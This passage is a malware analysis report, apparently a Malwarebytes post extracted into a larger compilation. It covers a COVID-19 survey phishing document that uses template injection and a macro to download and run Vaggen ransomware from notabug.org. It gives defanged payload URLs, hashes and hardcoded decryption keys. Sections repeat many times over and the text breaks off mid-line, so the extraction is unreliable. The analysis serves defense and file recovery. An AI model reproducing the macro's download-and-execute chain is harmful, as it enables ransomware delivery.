template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 955 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 956 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 957 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 958 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 959 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 960 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 961 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 962 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 963 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 964 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 965 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 966 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 967 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 968 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 969 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 970 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 971 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 972 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 973 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 974 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 975 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 976 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 977 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 978 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 979 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 980 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 981 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 982 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 983 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 984 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 985 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 986 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 987 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 988 of 